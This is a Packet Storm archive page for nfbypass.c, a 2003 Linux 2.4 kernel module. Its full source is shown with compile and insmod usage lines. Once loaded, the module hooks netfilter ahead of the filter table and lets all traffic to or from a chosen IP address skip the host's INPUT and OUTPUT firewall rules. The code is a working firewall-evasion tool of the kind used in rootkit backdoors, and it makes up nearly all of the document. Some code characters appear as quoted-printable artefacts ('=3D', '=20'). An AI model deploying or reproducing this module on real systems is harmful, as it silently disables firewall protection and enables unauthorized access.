exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nfbypass.c

nfbypass.c
Posted Apr 2, 2003
Authored by truff | Site projet7.org

nfbypass is a Linux kernel module for the 2.4.x series which, when inserted, will bypass netfilter rules.

tags | kernel
systems | linux
SHA-256 | c92278ac9f69f9e3fce669b4bdaf7609692c9cd2074111ab285fc98a64dc7c63

nfbypass.c

Change Mirror Download
/********************************************************\
* nfbypass.c *
* By truff (truff@projet7.org) *
* *
* Linux 2.4.x lkm to bypass netfilter INPUT and *
* OUTPUT rulez *
* *
* Compil: gcc -O2 -c nfbypass.c *
* Usage : insmod nfbypass.o my_ip=3D"xxx.xxx.xxx.xxx" *
* *
* Greetz to #root people and projet7 members @#!% *
* *
* www.projet7.org - Security Researchs - *
\********************************************************/

#define MODULE
#define __KERNEL__


#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/netfilter_ipv4.h>
#include <linux/netfilter_ipv4/ip_tables.h>


u_int32_t my_inet_addr (u_char *address);


static u_char *my_ip =3D NULL;
static u_int32_t my_address;=20
MODULE_PARM (my_ip, "s");

static unsigned int my_hook (unsigned int hook,=20
struct sk_buff **pskb,=20
const struct net_device *indev,=20
const struct net_device *outdev,=20
int (*okfn)(struct sk_buff *))
{
struct iphdr *ip;

ip =3D (struct iphdr *) ((*pskb)->nh.iph);
=20
if (((hook =3D=3D NF_IP_LOCAL_IN) && (ip->saddr =3D=3D my_address)) ||
((hook =3D=3D NF_IP_LOCAL_OUT)&& (ip->daddr =3D=3D my_address)))
{
/*
* OK, we Jump over Netfilter :)
*/
okfn (*pskb);
return NF_STOLEN;
}
else=20
return NF_ACCEPT;
}

static struct nf_hook_ops in_ops =3D {
{NULL, NULL}, my_hook, PF_INET, 0, NF_IP_PRI_FILTER-1
};

static struct nf_hook_ops out_ops =3D {
{NULL, NULL}, my_hook, PF_INET, 0, NF_IP_PRI_FILTER-1
};

int init_module (void)
{
my_address =3D my_inet_addr (my_ip);
=20
in_ops.hooknum =3D NF_IP_LOCAL_IN;
nf_register_hook (&in_ops);

out_ops.hooknum =3D NF_IP_LOCAL_OUT;
nf_register_hook (&out_ops);
=20
return 0;
}


void cleanup_module (void)
{
nf_unregister_hook(&in_ops);
nf_unregister_hook(&out_ops);
}


u_int32_t my_inet_addr (u_char *address)
{
u_int32_t u1, u2, u3, u4;
u_int32_t ip;
char *ptr;

if (address =3D=3D NULL)
return -1;

u1 =3D simple_strtoul (address, &ptr, 10);
u2 =3D simple_strtoul (ptr+1, &ptr, 10);
u3 =3D simple_strtoul (ptr+1, &ptr, 10);
u4 =3D simple_strtoul (ptr+1, &ptr, 10);
=20
ip =3D u4<<24 | u3<<16 | u2<<8 | u1;

return ip;
}


Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    11 Files
  • 7
    Aug 7th
    43 Files
  • 8
    Aug 8th
    42 Files
  • 9
    Aug 9th
    36 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close